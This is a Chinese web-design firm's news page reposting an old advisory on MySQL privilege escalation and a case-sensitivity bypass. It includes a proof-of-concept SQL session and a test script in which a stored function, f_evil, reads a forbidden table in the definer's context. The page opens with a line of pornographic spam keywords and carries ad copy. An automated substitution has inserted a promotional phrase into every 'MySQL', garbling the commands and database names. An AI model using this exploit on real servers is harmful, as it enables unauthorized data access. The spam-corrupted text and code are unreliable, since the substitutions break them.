日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
MySQL權(quán)限提升與安全限制問題探討

以下的文章主要講述的是MySQL權(quán)限提升與安全限制繞過漏洞的實際應用,我前幾天在相關(guān)網(wǎng)站看見MySQL權(quán)限提升與安全限制繞過漏洞的實際應用的資料,覺得挺好,今天就拿出來供大家分享。

10年積累的成都網(wǎng)站制作、成都網(wǎng)站設(shè)計經(jīng)驗,可以快速應對客戶對網(wǎng)站的新想法和需求。提供各種問題對應的解決方案。讓選擇我們的客戶得到更好、更有力的網(wǎng)絡服務。我雖然不認識你,你也不認識我。但先做網(wǎng)站后付款的網(wǎng)站建設(shè)流程,更有昌都免費網(wǎng)站建設(shè)讓你可以放心的選擇與我們合作。

受影響系統(tǒng):

MySQL(和PHP搭配之最佳組合) AB MySQL(和PHP搭配之最佳組合) <= 5.1.10

描述:

BUGTRAQ ID: 19559

MySQL(和PHP搭配之最佳組合)是一款使用非常廣泛的開放源代碼關(guān)系數(shù)據(jù)庫系統(tǒng),擁有各種平臺的運行版本。

在MySQL(和PHP搭配之最佳組合)上,擁有訪問權(quán)限但無創(chuàng)建權(quán)限的用戶可以創(chuàng)建與所訪問數(shù)據(jù)庫僅有名稱字母大小寫區(qū)別的新數(shù)據(jù)庫。成功利用這個漏洞要求運行MySQL(和PHP搭配之最佳組合)的文件系統(tǒng)支持區(qū)分大小寫的文件名。

此外,由于在錯誤的安全環(huán)境中計算了suid例程的參數(shù),攻擊者可以通過存儲的例程以例程定義者的權(quán)限執(zhí)行任意DML語句。成功攻擊要求用戶對所存儲例程擁有EXECUTE權(quán)限。

測試方法:

【警 告:以下程序(方法)可能帶有攻擊性,僅供安全研究與教學之用。使用者風險自負!】

1、創(chuàng)建數(shù)據(jù)庫

 
 
 
  1. $ MySQL(和PHP搭配之最佳組合) -h my.MySQL(和PHP搭配之最佳組合).server -u sample -p -A sample  
  2. Enter password:   
  3. Welcome to the MySQL(和PHP搭配之最佳組合) monitor. Commands end with ; or \g.  
  4. Your MySQL(和PHP搭配之最佳組合) connection id is 263935 to server version: 4.1.16-standard  
  5. MySQL(和PHP搭配之最佳組合)> create database another;  
  6. ERROR 1044: Access denied for user 'sample'@'%' to database 'another'  
  7. MySQL(和PHP搭配之最佳組合)> create database sAmple;   
  8. Query OK, 1 row affected (0.00 sec)  

2、權(quán)限提升

 
 
 
  1. --disable_warnings  
  2. drop database if exists MySQL(和PHP搭配之最佳組合)test1;  
  3. drop database if exists MySQL(和PHP搭配之最佳組合)test2;  
  4. drop function if exists f_suid;  
  5. --enable_warnings  
  6. # Prepare playground  
  7. create database MySQL(和PHP搭配之最佳組合)test1;  
  8. create database MySQL(和PHP搭配之最佳組合)test2;  
  9. create user malory@localhost;  
  10. grant all privileges on MySQL(和PHP搭配之最佳組合)test1.* to malory@localhost;  
  11. # Create harmless (but SUID!) function  
  12. create function f_suid(i int) returns int return 0;  
  13. grant execute on function test.f_suid to malory@localhost;  
  14. use MySQL(和PHP搭配之最佳組合)test2;  
  15. # Create table in which malory@localhost will be interested but to which  
  16. # he won't have any access  
  17. create table t1 (i int);  
  18. connect (malcon, localhost, malory,,MySQL(和PHP搭配之最佳組合)test1);  
  19. # Correct malory@localhost don't have access to MySQL(和PHP搭配之最佳組合)test2.t1  
  20. --error ER_TABLEACCESS_DENIED_ERROR  
  21. select * from MySQL(和PHP搭配之最佳組合)test2.t1;  
  22. # Create function which will allow to exploit security hole  
  23. delimiter |;  
  24. create function f_evil ()  
  25. returns int  
  26. sql security invoker  
  27. begin  
  28. set @a:= current_user();  
  29. set @b:= (select count(*) from MySQL(和PHP搭配之最佳組合)test2.t1);  
  30. return 0;  
  31. end|  
  32. delimiter ;|  
  33. # Again correct  
  34. --error ER_TABLEACCESS_DENIED_ERROR  
  35. select f_evil();  
  36. select @a, @b;  
  37. # Oops!!! it seems that f_evil() is executed in the context of  
  38. # f_suid() definer, so malory@locahost gets all info that he wants  
  39. select test.f_suid(f_evil());  
  40. select @a, @b;  
  41. connection default;  
  42. drop user malory@localhost;  
  43. drop database MySQL(和PHP搭配之最佳組合)test1;  
  44. drop database MySQL(和PHP搭配之最佳組合)test2;  

建議:

廠商補?。篗ySQL(和PHP搭配之最佳組合) AB,目前廠商已經(jīng)發(fā)布了升級補丁以修復這個安全問題,請到廠商的主頁下載。


文章題目:MySQL權(quán)限提升與安全限制問題探討
網(wǎng)站URL:http://www.dlmjj.cn/article/djpsesg.html